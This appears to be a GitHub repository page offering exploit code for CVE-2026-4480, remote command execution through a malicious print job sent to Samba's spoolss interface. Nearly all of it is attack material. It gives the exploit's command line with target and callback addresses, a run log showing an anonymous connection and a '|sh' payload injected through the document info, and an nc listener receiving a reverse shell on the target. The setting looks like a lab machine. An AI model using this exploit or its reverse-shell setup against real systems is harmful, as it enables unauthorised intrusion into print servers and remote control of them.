robinxiang/CVE-2026-4480
GitHub: robinxiang/CVE-2026-4480
Exploit code for CVE-2026-4480 that achieves remote command execution by submitting a malicious print job through the Samba spoolss interface.
Stars: 1 | Forks: 0
Running the exploit:
```
python ./exploit.py -t 10.129.20.16 -l 10.10.14.172 -p 8487
[*] Target: 10.129.20.16
[*] Callback: 10.10.14.172:8487
[*] Verify mode: False
[+] Credentials initialized (anonymous)
[+] Connected to spoolss interface
[+] Opened printer: HP-Reception
[+] Created DocumentInfo with payload: |sh
[+] Generated payload (78 bytes)
[*] Starting document...
[*] Starting page...
[*] Writing payload (78 bytes)...
[*] Ending page...
[*] Ending document (TRIGGERING EXPLOIT)...
[+] Print job submitted successfully!
[+] Closed printer handle
[+] Exploit completed!
[*] Check your listener for reverse shell...
```
Listener: `nc -lvnp 8487`
```
─$ nc -lvnp 8487
listening on [any] 8487 ...
connect to [10.10.14.172] from (UNKNOWN) [10.129.20.16] 40590
bash: cannot set terminal process group (16403): Inappropriate ioctl for device
bash: no job control in this shell
nobody@abducted:/var/spool/samba$ whoami
whoami
nobody
nobody@abducted:/var/spool/samba$ id
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@abducted:/var/spool/samba$
```